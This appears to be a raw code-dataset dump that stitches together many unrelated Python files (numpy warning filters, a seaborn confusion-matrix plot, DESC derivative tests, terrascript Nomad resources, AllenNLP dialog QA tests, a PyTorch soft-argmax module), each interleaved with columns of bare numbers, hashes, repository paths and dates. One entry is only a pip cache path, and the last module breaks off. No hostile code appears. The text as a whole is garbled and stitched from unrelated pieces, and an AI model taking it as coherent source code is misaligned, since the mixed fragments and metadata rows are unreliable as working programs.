# Hide benign warnings # https://github.com/numpy/numpy/pull/432/commits/170ed4e?diff=split import warnings warnings.filterwarnings("ignore", message=r".*numpy\.dtype size changed.*") warnings.filterwarnings("ignore", message="numpy.ufunc size changed")
42.333333
75
0.783465
33
254
6.030303
0.666667
0.221106
0.281407
0.351759
0
0
0
0
0
0
0
0.029412
0.062992
254
5
76
50.8
0.806723
0.34252
0
0
0
0
0.396341
0
0
0
0
0
0
1
0
true
0
0.333333
0
0.333333
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
6816fcbad0dedeaad73384153b25add7cb155dca
96
py
Python
venv/lib/python3.8/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py
Retraces/UkraineBot
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
[ "MIT" ]
2
2022-03-13T01:58:52.000Z
2022-03-31T06:07:54.000Z
venv/lib/python3.8/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py
DesmoSearch/Desmobot
b70b45df3485351f471080deb5c785c4bc5c4beb
[ "MIT" ]
19
2021-11-20T04:09:18.000Z
2022-03-23T15:05:55.000Z
venv/lib/python3.8/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py
DesmoSearch/Desmobot
b70b45df3485351f471080deb5c785c4bc5c4beb
[ "MIT" ]
null
null
null
/home/runner/.cache/pip/pool/b9/7d/f2/a389e0207769f5fe8fe4011898ec22b9256943898bfe1f24c8ffc71f2f
96
96
0.895833
9
96
9.555556
1
0
0
0
0
0
0
0
0
0
0
0.427083
0
96
1
96
96
0.46875
0
0
0
0
0
0
0
0
1
0
0
0
0
null
null
0
0
null
null
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
1
0
0
0
1
0
0
0
0
0
0
0
0
6
a8d580286fd6e40c8c83c0badc74cb88ced660ca
1,039
py
Python
extras/plot_confusion_matrix.py
SHANK885/PKNN-MIFS
5e3e2ecd3719db2ed83f0c7a264950a914258670
[ "MIT" ]
null
null
null
extras/plot_confusion_matrix.py
SHANK885/PKNN-MIFS
5e3e2ecd3719db2ed83f0c7a264950a914258670
[ "MIT" ]
null
null
null
extras/plot_confusion_matrix.py
SHANK885/PKNN-MIFS
5e3e2ecd3719db2ed83f0c7a264950a914258670
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- import seaborn as sn import pandas as pd import matplotlib.pyplot as plt array = [[228, 0, 0, 1, 4, 27, 4, 3, 0, 1, 0, 0], [ 0, 1, 0, 0, 0, 0, 0, 0, 0 , 0, 0, 0], [ 0, 0, 1, 0, 1, 0, 0, 0, 0 , 0 , 0, 0], [ 4, 0, 1, 15, 5, 3, 0, 1, 0 , 0 , 1, 0], [ 6, 0, 0, 0, 38, 6 , 1 , 0 , 0 , 0, 1, 0], [ 32, 0, 0, 1, 2, 81 , 5 , 1 , 0 , 0 , 0, 0], [ 6, 0, 0, 0, 0, 2 , 20 , 1 , 0 , 0 , 0, 0], [ 9, 0, 0, 0, 6, 0 , 1 , 15 , 0 ,0 , 0, 0], [ 1, 0, 0, 0, 0, 1, 0, 0, 38 , 0 , 0, 1], [ 1, 0, 0, 0, 0, 0, 0, 0, 0 , 2 , 0 , 0], [ 1, 0, 1, 0, 1, 0, 0, 0, 0, 0 ,31 , 0], [ 2, 0, 0, 0, 1, 0, 0 , 0, 0, 0, 0, 11]] df_cm = pd.DataFrame(array, range(len(array)), range(len(array))) plt.figure(figsize = (10,7)) sn.set(font_scale=1.4) sn.heatmap(df_cm, annot=True,annot_kws={"size": 16})# font size
43.291667
70
0.346487
195
1,039
1.825641
0.246154
0.359551
0.36236
0.314607
0.308989
0.213483
0.185393
0.174157
0.151685
0.073034
0
0.283247
0.442733
1,039
23
71
45.173913
0.331606
0.029836
0
0
0
0
0.00398
0
0
0
0
0
0
1
0
false
0
0.157895
0
0.157895
0
0
0
1
null
1
1
1
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
7651877017b092874f87f27073ef8923979b9ec4
65
py
Python
src/hcb/codes/__init__.py
Strilanc/honeycomb-boundaries
cc33baac44c7831bd643db81d0053f8ec6eae9d8
[ "Apache-2.0" ]
null
null
null
src/hcb/codes/__init__.py
Strilanc/honeycomb-boundaries
cc33baac44c7831bd643db81d0053f8ec6eae9d8
[ "Apache-2.0" ]
2
2022-02-25T22:28:24.000Z
2022-03-23T21:09:04.000Z
src/hcb/codes/__init__.py
Strilanc/honeycomb-boundaries
cc33baac44c7831bd643db81d0053f8ec6eae9d8
[ "Apache-2.0" ]
null
null
null
from .surface.memory import generate_surface_code_memory_problem
32.5
64
0.907692
9
65
6.111111
0.777778
0
0
0
0
0
0
0
0
0
0
0
0.061538
65
1
65
65
0.901639
0
0
0
1
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7693975e7da7cb504503c465610765fa117a5648
312
py
Python
egegl/models/expert/__init__.py
elix-tech/infrag
e5fa6b91659ed94e64ffbb3272b90fd3618e017e
[ "MIT" ]
1
2021-09-28T09:38:28.000Z
2021-09-28T09:38:28.000Z
egegl/models/expert/__init__.py
elix-tech/infrag
e5fa6b91659ed94e64ffbb3272b90fd3618e017e
[ "MIT" ]
null
null
null
egegl/models/expert/__init__.py
elix-tech/infrag
e5fa6b91659ed94e64ffbb3272b90fd3618e017e
[ "MIT" ]
1
2021-11-19T11:10:54.000Z
2021-11-19T11:10:54.000Z
""" Copyright (c) 2021 Elix, Inc. """ from .ge_operations.crossover import crossover from .ge_operations.fragment_crossover import fragment_crossover from .ge_operations.mutate import mutate from .ge_operations.selfies_crossover import selfies_crossover from .ge_operations.selfies_mutate import selfies_mutate
31.2
64
0.846154
41
312
6.170732
0.317073
0.118577
0.316206
0.296443
0
0
0
0
0
0
0
0.014085
0.089744
312
9
65
34.666667
0.876761
0.092949
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
76bd210d045e0384ae5c7884380d6166916aa290
274
py
Python
app/app/api/domain/services/factories/ExerciseEvaluationQueryRepositoryFactory.py
GPortas/Playgroundb
60f98a4dd62ce34fbb8abfa0d9ee63697e82c57e
[ "Apache-2.0" ]
1
2019-01-30T19:59:20.000Z
2019-01-30T19:59:20.000Z
app/app/api/domain/services/factories/ExerciseEvaluationQueryRepositoryFactory.py
GPortas/Playgroundb
60f98a4dd62ce34fbb8abfa0d9ee63697e82c57e
[ "Apache-2.0" ]
null
null
null
app/app/api/domain/services/factories/ExerciseEvaluationQueryRepositoryFactory.py
GPortas/Playgroundb
60f98a4dd62ce34fbb8abfa0d9ee63697e82c57e
[ "Apache-2.0" ]
null
null
null
from app.api.data.query.ExerciseEvaluationMongoQueryRepository import ExerciseEvaluationMongoQueryRepository class ExerciseEvaluationQueryRepositoryFactory: def create_exercise_evaluation_query_repository(self): return ExerciseEvaluationMongoQueryRepository()
39.142857
108
0.875912
19
274
12.421053
0.842105
0
0
0
0
0
0
0
0
0
0
0
0.087591
274
6
109
45.666667
0.944
0
0
0
0
0
0
0
0
0
0
0
0
1
0.25
false
0
0.25
0.25
1
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
96d6662a52f382a2dd59a78e81942445cbc71582
10,680
py
Python
tests/test_derivatives.py
MothVine/DESC
8f18ca63b34dad07ec67a4d43945d39287b303b8
[ "MIT" ]
9
2021-07-27T13:12:46.000Z
2022-03-30T12:28:07.000Z
tests/test_derivatives.py
MothVine/DESC
8f18ca63b34dad07ec67a4d43945d39287b303b8
[ "MIT" ]
97
2021-06-20T02:42:12.000Z
2022-03-29T20:54:14.000Z
tests/test_derivatives.py
MothVine/DESC
8f18ca63b34dad07ec67a4d43945d39287b303b8
[ "MIT" ]
3
2020-11-14T23:25:39.000Z
2021-05-13T20:05:36.000Z
import unittest import numpy as np from desc.backend import jnp from desc.derivatives import AutoDiffDerivative, FiniteDiffDerivative from numpy.random import default_rng class TestDerivative(unittest.TestCase): """Tests Grid classes""" def test_finite_diff_vec(self): def test_fun(x, y, a): return x * y + a x = np.array([1, 5, 0.01, 200]) y = np.array([60, 1, 100, 0.02]) a = -2 jac = FiniteDiffDerivative(test_fun, argnum=0) J = jac.compute(x, y, a) correct_J = np.diag(y) np.testing.assert_allclose(J, correct_J, atol=1e-8) def test_finite_diff_scalar(self): def test_fun(x, y, a): return np.dot(x, y) + a x = np.array([1, 5, 0.01, 200]) y = np.array([60, 1, 100, 0.02]) a = -2 jac = FiniteDiffDerivative(test_fun, argnum=0) J = jac.compute(x, y, a) correct_J = y np.testing.assert_allclose(J, correct_J, atol=1e-8) jac.argnum = 1 J = jac.compute(x, y, a) np.testing.assert_allclose(J, x, atol=1e-8) def test_auto_diff(self): def test_fun(x, y, a): return jnp.cos(x) + x * y + a x = np.array([1, 5, 0.01, 200]) y = np.array([60, 1, 100, 0.02]) a = -2 jac = AutoDiffDerivative(test_fun, argnum=0) J = jac.compute(x, y, a) correct_J = np.diag(-np.sin(x) + y) np.testing.assert_allclose(J, correct_J, atol=1e-8) def test_compare_AD_FD(self): def test_fun(x, y, a): return jnp.cos(x) + x * y + a x = np.array([1, 5, 0.01, 200]) y = np.array([60, 1, 100, 0.02]) a = -2 jac_AD = AutoDiffDerivative(test_fun, argnum=0) J_AD = jac_AD.compute(x, y, a) jac_FD = AutoDiffDerivative(test_fun, argnum=0) J_FD = jac_FD.compute(x, y, a) np.testing.assert_allclose(J_FD, J_AD, atol=1e-8) def test_fd_hessian(self): rando = default_rng(seed=0) n = 5 A = rando.random((n, n)) A = A + A.T g = rando.random(n) def f(x): return 5 + g.dot(x) + x.dot(1 / 2 * A.dot(x)) hess = FiniteDiffDerivative(f, argnum=0, mode="hess") y = rando.random(n) A1 = hess(y) np.testing.assert_allclose(A1, A) def test_block_jacobian(self): rando = default_rng(seed=0) A = rando.random((19, 17)) def fun(x): return jnp.dot(A, x) x = 
rando.random(17) jac = AutoDiffDerivative(fun, block_size=4, shape=A.shape) np.testing.assert_allclose(jac(x), A) jac = AutoDiffDerivative(fun, num_blocks=3, shape=A.shape) np.testing.assert_allclose(jac(x), A) class TestJVP(unittest.TestCase): @staticmethod def fun(x, c1, c2): Amat = np.arange(12).reshape((4, 3)) return jnp.dot(Amat, (x + c1 * c2) ** 3) x = np.ones(3).astype(float) c1 = np.arange(3).astype(float) c2 = np.arange(3).astype(float) + 2 dx = np.array([1, 2, 3]).astype(float) dc1 = np.array([3, 4, 5]).astype(float) dc2 = np.array([-3, 1, -2]).astype(float) def test_autodiff_jvp(self): df = AutoDiffDerivative.compute_jvp( self.fun, 0, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([1554.0, 4038.0, 6522.0, 9006.0])) df = AutoDiffDerivative.compute_jvp( self.fun, 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([10296.0, 26658.0, 43020.0, 59382.0])) df = AutoDiffDerivative.compute_jvp( self.fun, (0, 2), (self.dx, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([-342.0, -630.0, -918.0, -1206.0])) def test_finitediff_jvp(self): df = FiniteDiffDerivative.compute_jvp( self.fun, 0, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([1554.0, 4038.0, 6522.0, 9006.0])) df = FiniteDiffDerivative.compute_jvp( self.fun, 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([10296.0, 26658.0, 43020.0, 59382.0])) df = FiniteDiffDerivative.compute_jvp( self.fun, (0, 2), (self.dx, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([-342.0, -630.0, -918.0, -1206.0])) def test_autodiff_jvp2(self): df = AutoDiffDerivative.compute_jvp2( self.fun, 0, 0, self.dx + 1, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([1440.0, 3852.0, 6264.0, 8676.0])) df = AutoDiffDerivative.compute_jvp2( self.fun, 1, 1, self.dc1 + 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, 
np.array([56160.0, 147744.0, 239328.0, 330912.0]) ) df = AutoDiffDerivative.compute_jvp2( self.fun, 0, 2, self.dx, self.dc2, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([-1248.0, -3048.0, -4848.0, -6648.0])) df = AutoDiffDerivative.compute_jvp2( self.fun, 0, (1, 2), self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([5808.0, 15564.0, 25320.0, 35076.0])) df = AutoDiffDerivative.compute_jvp2( self.fun, (1, 2), (1, 2), (self.dc1, self.dc2), (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose(df, np.array([22368.0, 63066.0, 103764.0, 144462.0])) df = AutoDiffDerivative.compute_jvp2( self.fun, 0, (1, 2), self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([5808.0, 15564.0, 25320.0, 35076.0])) def test_finitediff_jvp2(self): df = FiniteDiffDerivative.compute_jvp2( self.fun, 0, 0, self.dx + 1, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([1440.0, 3852.0, 6264.0, 8676.0])) df = FiniteDiffDerivative.compute_jvp2( self.fun, 1, 1, self.dc1 + 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, np.array([56160.0, 147744.0, 239328.0, 330912.0]) ) df = FiniteDiffDerivative.compute_jvp2( self.fun, 0, 2, self.dx, self.dc2, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([-1248.0, -3048.0, -4848.0, -6648.0])) df = FiniteDiffDerivative.compute_jvp2( self.fun, 0, (1, 2), self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([5808.0, 15564.0, 25320.0, 35076.0])) df = FiniteDiffDerivative.compute_jvp2( self.fun, (1, 2), (1, 2), (self.dc1, self.dc2), (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose(df, np.array([22368.0, 63066.0, 103764.0, 144462.0])) df = FiniteDiffDerivative.compute_jvp2( self.fun, 0, (1, 2), self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, 
np.array([5808.0, 15564.0, 25320.0, 35076.0])) def test_autodiff_jvp3(self): df = AutoDiffDerivative.compute_jvp3( self.fun, 0, 0, 0, self.dx + 1, self.dx, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([504.0, 1404.0, 2304.0, 3204.0])) df = AutoDiffDerivative.compute_jvp3( self.fun, 0, 1, 1, self.dx, self.dc1 + 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([19440.0, 52704.0, 85968.0, 119232.0])) df = AutoDiffDerivative.compute_jvp3( self.fun, 0, 1, 2, self.dx, self.dc1, self.dc2, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, np.array([-5784.0, -14118.0, -22452.0, -30786.0]) ) df = AutoDiffDerivative.compute_jvp3( self.fun, 0, 0, (1, 2), self.dx, self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose(df, np.array([2040.0, 5676.0, 9312.0, 12948.0])) df = AutoDiffDerivative.compute_jvp3( self.fun, (1, 2), (1, 2), (1, 2), (self.dc1, self.dc2), (self.dc1, self.dc2), (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose( df, np.array([-33858.0, -55584.0, -77310.0, -99036.0]) ) def test_finitediff_jvp3(self): df = FiniteDiffDerivative.compute_jvp3( self.fun, 0, 0, 0, self.dx + 1, self.dx, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, np.array([504.0, 1404.0, 2304.0, 3204.0]), rtol=1e-4 ) df = FiniteDiffDerivative.compute_jvp3( self.fun, 0, 1, 1, self.dx, self.dc1 + 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, np.array([19440.0, 52704.0, 85968.0, 119232.0]), rtol=1e-4 ) df = FiniteDiffDerivative.compute_jvp3( self.fun, 0, 1, 2, self.dx, self.dc1, self.dc2, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, np.array([-5784.0, -14118.0, -22452.0, -30786.0]), rtol=1e-4 ) df = FiniteDiffDerivative.compute_jvp3( self.fun, 0, 0, (1, 2), self.dx, self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose( df, np.array([2040.0, 5676.0, 9312.0, 12948.0]), rtol=1e-4 ) df 
= FiniteDiffDerivative.compute_jvp3( self.fun, (1, 2), (1, 2), (1, 2), (self.dc1, self.dc2), (self.dc1, self.dc2), (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose( df, np.array([-33858.0, -55584.0, -77310.0, -99036.0]), rtol=1e-4 )
33.479624
88
0.533052
1,544
10,680
3.610104
0.100389
0.048977
0.096878
0.148547
0.839612
0.823107
0.798708
0.766416
0.726588
0.707212
0
0.134052
0.31339
10,680
318
89
33.584906
0.626074
0.001685
0
0.609665
0
0
0.000375
0
0
0
0
0
0.133829
1
0.070632
false
0
0.018587
0.022305
0.144981
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
96f0f997e8b1212818676f15e5230c53e58c694d
95
py
Python
katas/kyu_8/repeat_it.py
the-zebulan/CodeWars
1eafd1247d60955a5dfb63e4882e8ce86019f43a
[ "MIT" ]
40
2016-03-09T12:26:20.000Z
2022-03-23T08:44:51.000Z
katas/kyu_8/repeat_it.py
akalynych/CodeWars
1eafd1247d60955a5dfb63e4882e8ce86019f43a
[ "MIT" ]
null
null
null
katas/kyu_8/repeat_it.py
akalynych/CodeWars
1eafd1247d60955a5dfb63e4882e8ce86019f43a
[ "MIT" ]
36
2016-11-07T19:59:58.000Z
2022-03-31T11:18:27.000Z
def repeat_it(string, n): return string * n if isinstance(string, str) else 'Not a string'
31.666667
68
0.705263
16
95
4.125
0.75
0.212121
0
0
0
0
0
0
0
0
0
0
0.189474
95
2
69
47.5
0.857143
0
0
0
0
0
0.126316
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
96f8f7ef87c8b273a2348dc0c0fb934f9da2a82f
24
py
Python
hermes/language/__init__.py
dbracewell/pyHermes
09964eb566b74d1d3ae2b99849b06c4d07242e5b
[ "Apache-2.0" ]
null
null
null
hermes/language/__init__.py
dbracewell/pyHermes
09964eb566b74d1d3ae2b99849b06c4d07242e5b
[ "Apache-2.0" ]
null
null
null
hermes/language/__init__.py
dbracewell/pyHermes
09964eb566b74d1d3ae2b99849b06c4d07242e5b
[ "Apache-2.0" ]
null
null
null
from .language import *
12
23
0.75
3
24
6
1
0
0
0
0
0
0
0
0
0
0
0
0.166667
24
1
24
24
0.9
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8c2da4b5937893067dc0266b58695aed719a124a
444
py
Python
terrascript/nomad/r.py
hugovk/python-terrascript
08fe185904a70246822f5cfbdc9e64e9769ec494
[ "BSD-2-Clause" ]
null
null
null
terrascript/nomad/r.py
hugovk/python-terrascript
08fe185904a70246822f5cfbdc9e64e9769ec494
[ "BSD-2-Clause" ]
null
null
null
terrascript/nomad/r.py
hugovk/python-terrascript
08fe185904a70246822f5cfbdc9e64e9769ec494
[ "BSD-2-Clause" ]
null
null
null
# terrascript/nomad/r.py import terrascript class nomad_acl_policy(terrascript.Resource): pass class nomad_acl_token(terrascript.Resource): pass class nomad_job(terrascript.Resource): pass class nomad_namespace(terrascript.Resource): pass class nomad_quota_specification(terrascript.Resource): pass class nomad_sentinel_policy(terrascript.Resource): pass class nomad_volume(terrascript.Resource): pass
14.322581
54
0.777027
52
444
6.423077
0.326923
0.209581
0.482036
0.502994
0.628743
0.233533
0
0
0
0
0
0
0.150901
444
30
55
14.8
0.885942
0.04955
0
0.466667
0
0
0
0
0
0
0
0
0
1
0
true
0.466667
0.066667
0
0.533333
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
1
0
0
6
8c4194478f1bf43813dd29724c3eec4fe13d2aef
5,052
py
Python
tests/rc/predictors/dialog_qa_test.py
matt-peters/allennlp-models
cdd505ed539fdc2b82e4cc0a23eae4bfd3368e7e
[ "Apache-2.0" ]
402
2020-03-11T22:58:35.000Z
2022-03-29T09:05:27.000Z
tests/rc/predictors/dialog_qa_test.py
matt-peters/allennlp-models
cdd505ed539fdc2b82e4cc0a23eae4bfd3368e7e
[ "Apache-2.0" ]
116
2020-03-11T01:26:57.000Z
2022-03-25T13:03:56.000Z
tests/rc/predictors/dialog_qa_test.py
matt-peters/allennlp-models
cdd505ed539fdc2b82e4cc0a23eae4bfd3368e7e
[ "Apache-2.0" ]
140
2020-03-11T00:51:35.000Z
2022-03-29T09:05:36.000Z
from allennlp.models.archival import load_archive from allennlp.predictors import Predictor from tests import FIXTURES_ROOT class TestDialogQAPredictor: def test_uses_named_inputs(self): inputs = { "paragraphs": [ { "qas": [ { "followup": "y", "yesno": "x", "question": "When was the first one?", "answers": [{"answer_start": 0, "text": "One time"}], "id": "C_q#0", }, { "followup": "n", "yesno": "x", "question": "What were you doing?", "answers": [{"answer_start": 15, "text": "writing a"}], "id": "C_q#1", }, { "followup": "m", "yesno": "y", "question": "How often?", "answers": [{"answer_start": 4, "text": "time I"}], "id": "C_q#2", }, ], "context": "One time I was writing a unit test,\ and it succeeded on the first attempt.", } ] } archive = load_archive( FIXTURES_ROOT / "rc" / "dialog_qa" / "serialization" / "model.tar.gz" ) predictor = Predictor.from_archive(archive, "dialog_qa") result = predictor.predict_json(inputs) best_span_str_list = result.get("best_span_str") for best_span_str in best_span_str_list: assert isinstance(best_span_str, str) assert best_span_str != "" def test_batch_prediction(self): inputs = [ { "paragraphs": [ { "qas": [ { "followup": "y", "yesno": "x", "question": "When was the first one?", "answers": [{"answer_start": 0, "text": "One time"}], "id": "C_q#0", }, { "followup": "n", "yesno": "x", "question": "What were you doing?", "answers": [{"answer_start": 15, "text": "writing a"}], "id": "C_q#1", }, { "followup": "m", "yesno": "y", "question": "How often?", "answers": [{"answer_start": 4, "text": "time I"}], "id": "C_q#2", }, ], "context": "One time I was writing a unit test,\ and it succeeded on the first attempt.", } ] }, { "paragraphs": [ { "qas": [ { "followup": "y", "yesno": "x", "question": "When was the first one?", "answers": [{"answer_start": 0, "text": "One time"}], "id": "C_q#0", }, { "followup": "n", "yesno": "x", "question": "What were you doing?", "answers": [{"answer_start": 15, "text": "writing a"}], "id": "C_q#1", }, { 
"followup": "m", "yesno": "y", "question": "How often?", "answers": [{"answer_start": 4, "text": "time I"}], "id": "C_q#2", }, ], "context": "One time I was writing a unit test,\ and it succeeded on the first attempt.", } ] }, ] archive = load_archive( FIXTURES_ROOT / "rc" / "dialog_qa" / "serialization" / "model.tar.gz" ) predictor = Predictor.from_archive(archive, "dialog_qa") results = predictor.predict_batch_json(inputs) assert len(results) == 2
40.416
87
0.305819
344
5,052
4.340116
0.25
0.078366
0.108506
0.044206
0.747488
0.747488
0.747488
0.747488
0.747488
0.747488
0
0.010372
0.580166
5,052
124
88
40.741935
0.693541
0
0
0.568966
0
0
0.171813
0
0
0
0
0
0.025862
1
0.017241
false
0
0.025862
0
0.051724
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
4fce610faca889ec8646a95d9cbc176ef47a31e8
7,171
py
Python
pedrec/utils/torch_utils/torch_modules.py
noboevbo/PedRec
891d19bd6a2c7a7d71c2e41d37e7b4c4bfc7762e
[ "MIT" ]
1
2022-03-09T01:24:10.000Z
2022-03-09T01:24:10.000Z
pedrec/utils/torch_utils/torch_modules.py
noboevbo/PedRec
891d19bd6a2c7a7d71c2e41d37e7b4c4bfc7762e
[ "MIT" ]
null
null
null
pedrec/utils/torch_utils/torch_modules.py
noboevbo/PedRec
891d19bd6a2c7a7d71c2e41d37e7b4c4bfc7762e
[ "MIT" ]
null
null
null
from typing import Optional, Tuple

import torch
import torch.nn as nn
import torch.nn.functional as F

from pedrec.utils.torch_utils.torch_helper import create_meshgrid, create_linspace


class DepthRegression(nn.Module):
    """Collapses a BxCxHxW response map into one scalar per channel.

    The map is passed through a sigmoid and flattened over the spatial
    dimensions, then weighted by ``pose_heatmap`` and summed.
    """

    def __init__(self) -> None:
        super().__init__()

    def forward(self, input: torch.Tensor, pose_heatmap: torch.Tensor) -> torch.Tensor:
        """Return ``sum(sigmoid(input) * pose_heatmap)`` over the flattened
        spatial dims, shape (B, C, 1).

        Args:
            input: response maps of shape (B, C, H, W).
            pose_heatmap: weighting term; assumed to broadcast against the
                flattened (B, C, H*W) map — TODO confirm caller contract.

        Raises:
            TypeError: if ``input`` is not a torch.Tensor.
            ValueError: if ``input`` is not 4-dimensional.
        """
        if not torch.is_tensor(input):
            # NOTE: original message read "Input input type" — duplicated word fixed.
            raise TypeError("Input type is not a torch.Tensor. Got {}"
                            .format(type(input)))
        if not len(input.shape) == 4:
            raise ValueError("Invalid input shape, we expect BxCxHxW. Got: {}"
                             .format(input.shape))
        # Flatten the spatial dimensions so the weighted sum is a single reduction.
        batch_size, channels, height, width = input.shape
        x: torch.Tensor = input.view(batch_size, channels, -1)
        x_sigmoid: torch.Tensor = torch.sigmoid(x)
        result = torch.sum(x_sigmoid * pose_heatmap, -1, keepdim=True)
        return result


class SoftArgmax1d(nn.Module):
    """Soft argmax over the last dimension of the input.

    Args:
        norm_val: temperature applied to the logits before the softmax.
        normalized_coordinates: whether the expected coordinate is returned in
            [-1, 1] instead of index space (semantics delegated to
            ``create_linspace`` — presumably matches the 2D variants; verify).
    """

    def __init__(self, norm_val: float = 1.0,
                 normalized_coordinates: Optional[bool] = True) -> None:
        super().__init__()
        self.normalized_coordinates: Optional[bool] = normalized_coordinates
        self.norm_val = norm_val

    def forward(self, input: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
        """Return ``(softmax(input * norm_val), expected coordinate)``.

        Raises:
            TypeError: if ``input`` is not a torch.Tensor.
        """
        if not torch.is_tensor(input):
            raise TypeError("Input type is not a torch.Tensor. Got {}"
                            .format(type(input)))
        # Softmax over the last dim; norm_val sharpens/flattens the distribution.
        x_soft: torch.Tensor = F.softmax(input * self.norm_val, dim=-1)
        pos_x = create_linspace(input, self.normalized_coordinates)
        # Expectation of the coordinate under the softmax distribution.
        expected_x: torch.Tensor = torch.sum(pos_x * x_soft, -1, keepdim=True)
        return x_soft, expected_x


class SoftArgmax2d(nn.Module):
    r"""Creates a module that computes the Soft-Argmax 2D of a given input
    heatmap with a configurable softmax temperature.

    Returns the softmax distribution and the expected 2d coordinates of the
    given map. The output order is x-coord and y-coord.

    Arguments:
        norm_val (float): temperature applied to the logits before the softmax.
        normalized_coordinates (Optional[bool]): whether to return the
          coordinates normalized in the range of [-1, 1]. Otherwise,
          it will return the coordinates in the range of the input shape.
          Default is True.

    Shape:
        - Input: :math:`(B, N, H, W)`
        - Output: :math:`(B, N, 2)`

    Examples::
        >>> input = torch.rand(1, 4, 2, 3)
        >>> m = SoftArgmax2d()
        >>> x_soft, coords = m(input)  # coords: 1x4x2
        >>> x_coord, y_coord = torch.chunk(coords, dim=-1, chunks=2)
    """

    def __init__(self, norm_val: float = 1.0,
                 normalized_coordinates: Optional[bool] = True) -> None:
        super().__init__()
        self.normalized_coordinates: Optional[bool] = normalized_coordinates
        self.norm_val = norm_val

    def forward(self, input: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
        """Return ``(softmax map, expected (x, y) per channel)``.

        Raises:
            TypeError: if ``input`` is not a torch.Tensor.
            ValueError: if ``input`` is not 4-dimensional.
        """
        if not torch.is_tensor(input):
            raise TypeError("Input type is not a torch.Tensor. Got {}"
                            .format(type(input)))
        if not len(input.shape) == 4:
            raise ValueError("Invalid input shape, we expect BxCxHxW. Got: {}"
                             .format(input.shape))
        # Flatten spatial dims so the softmax covers the whole heatmap at once.
        batch_size, channels, height, width = input.shape
        x: torch.Tensor = input.view(batch_size, channels, -1)

        x_soft: torch.Tensor = F.softmax(x * self.norm_val, dim=-1)
        pos_y, pos_x = create_meshgrid(input, self.normalized_coordinates)
        pos_x = pos_x.reshape(-1)
        pos_y = pos_y.reshape(-1)
        # Expected coordinates under the softmax distribution.
        expected_x: torch.Tensor = torch.sum(pos_x * x_soft, -1, keepdim=True)
        expected_y: torch.Tensor = torch.sum(pos_y * x_soft, -1, keepdim=True)
